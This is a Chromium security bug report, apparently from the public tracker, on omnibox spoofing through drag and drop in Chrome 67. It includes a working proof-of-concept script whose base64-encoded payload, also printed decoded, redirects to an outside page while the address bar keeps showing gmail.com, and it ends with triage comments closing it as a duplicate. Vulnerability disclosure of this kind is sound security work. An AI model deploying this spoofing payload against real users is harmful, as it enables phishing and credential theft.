Issue 863287 link

Starred by 1 user

Issue metadata

Status: Duplicate
Merged: issue 698156
Owner: ----
Closed: Jul 13
Cc:
Components:
EstimatedDays: ----
NextAction: ----
OS: Linux , Windows , Chrome , Mac
Pri: 3
Type: Bug-Security



Security: Chrome Omnibox Spoofing with Drag&Drop

Reported by xis...@gmail.com, Jul 13

Issue description

VULNERABILITY DETAILS
When the navigation succeeds, the dragged-and-dropped URL is always shown in the omnibox and fails to refresh on navigation.

VERSION
Chrome Version: 67.0.3396.99+[Stable]
Operating System: [Windows]

REPRODUCTION CASE
Drag and drop links to the current TAB.

POC:

<script>
// Fires on the attacker's page once the user has dropped the link onto the tab.
// By then the drop has already started a navigation to the dragged URL
// (https://www.gmail.com/), and the omnibox is already displaying that URL.
document.addEventListener("dragend", function() {
  // Overwrite the current document with the base64-encoded payload
  // (decoded below): it renders "Spoof" and then redirects to an
  // attacker-controlled page while the omnibox keeps showing the dropped URL.
  document.write(atob('PGgxPlNwb29mPC9oMT4KPHNjcmlwdD4KbG9jYXRpb249J2h0dHA6Ly94aXNpZ3IuY29tL3Rlc3QxOTk1L0dtYWlsLmh0bSc7Ci8vbG9jYXRpb249J2h0dHBzOi8vYXBwbGUuY29tJzsKPC9zY3JpcHQ+Cgo='));
  // Set a plausible title for the spoofed page.
  document.write('<title>Google</title>');
});
</script>

<p>
Drag and drop links to the current TAB.
</p>
<a href="https://www.gmail.com/">www.gmail.com</a> 
 
base64 decode (the payload written by the dragend handler above):
<h1>Spoof</h1>
<script>
// Redirect to the attacker-controlled page; the alternative target is left commented out.
location='http://xisigr.com/test1995/Gmail.htm';
//location='https://apple.com';
</script>
 
Cc: creis@chromium.org
Components: UI>Browser>Navigation UI>Browser>Omnibox
Labels: Security_Severity-Low M-70 OS-Chrome OS-Linux OS-Mac OS-Windows Pri-3
Status: Available (was: Unconfirmed)
Mergedinto: 698156
Status: Duplicate (was: Available)
(oops, hit Enter too soon)
This looks identical to issue 698156, though please do let me know if I'm missing something. We would like to do something to differentiate pending navigations from those that have committed (besides the lock icon, which is a mitigating factor in this attack), but we're not quite sure yet what to do that users will realistically notice/understand.
Cc: emilyschechter@chromium.org edwardjung@chromium.org maxwalker@chromium.org

Comment 4 by sheriffbot@chromium.org, Oct 20

Labels: -Restrict-View-SecurityTeam allpublic
This bug has been closed for more than 14 weeks. Removing security view restrictions.

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot